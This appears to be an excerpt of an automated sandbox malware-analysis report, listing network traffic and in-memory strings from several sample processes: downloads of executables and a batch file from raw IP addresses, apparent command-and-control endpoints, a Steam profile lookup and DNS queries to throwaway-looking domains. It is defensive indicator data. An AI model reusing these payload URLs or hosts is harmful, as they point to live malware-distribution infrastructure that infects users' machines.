                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B0E0C0 recv,recv,recv,recv,6_2_00B0E0C0
                            Source: global trafficHTTP traffic detected: GET /forsale/infinity.exe HTTP/1.1Host: 91.240.118.49
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38c926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38d926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38a926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38b926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb388926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb389926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb386926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb387926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f842a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f852a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f862a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f872a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f802a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f812a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f822a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f832a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /files/941767796/ktIplF5.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: warlikedbeliev.org
                            Source: global trafficDNS traffic detected: DNS query: DGGKjBirXBdcY.DGGKjBirXBdcY
                            Source: global trafficDNS traffic detected: DNS query: breakfasutwy.cyou
                            Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
                            Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
                            Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
                            Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
                            Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
                            Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
                            Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
                            Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
                            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                            Source: global trafficDNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC
                            Source: global trafficDNS traffic detected: DNS query: www.google.com
                            Source: global trafficDNS traffic detected: DNS query: httpbin.org
                            Source: global trafficDNS traffic detected: DNS query: apis.google.com
                            Source: global trafficDNS traffic detected: DNS query: play.google.com
                            Source: global trafficDNS traffic detected: DNS query: home.fivegg5th.top
                            Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                            Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                            Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                            Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                            Source: global trafficDNS traffic detected: DNS query: c.msn.com
                            Source: global trafficDNS traffic detected: DNS query: api.msn.com
                            Source: global trafficDNS traffic detected: DNS query: rampnatleadk.click
                            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/15/
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpRs
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phphkD
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/ws
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115_
                            Source: AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Local
                            Source: AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/kU
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/l
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe)
                            Source: AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                            Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                            Source: AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe5
                            Source: AApUa7VQiy.exe, 00000000.00000003.1461943406.00000000014A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeO
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/test/am_no.bat
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/test/am_no.bat~.EV
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/testdef/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe%
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe/
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe133001
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe450
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe5cs.NV
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe61395d7f
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exeI1OV
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exeQq
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exeZ
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exeata
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exec61395d7f
                            Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/steam/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$2
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpP
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/941767796/ktIplF5.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/941767796/ktIplF5.exe6
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/Cyber_Yoda/random.exe
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/c0dxnfz/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/initlosizz198hyjdr/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/martin1/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/martin1/random.exeGx
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exeb
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exel
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/sawdu5t/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/sunnywebZ/random.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/sunnywebZ/random.exeP
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
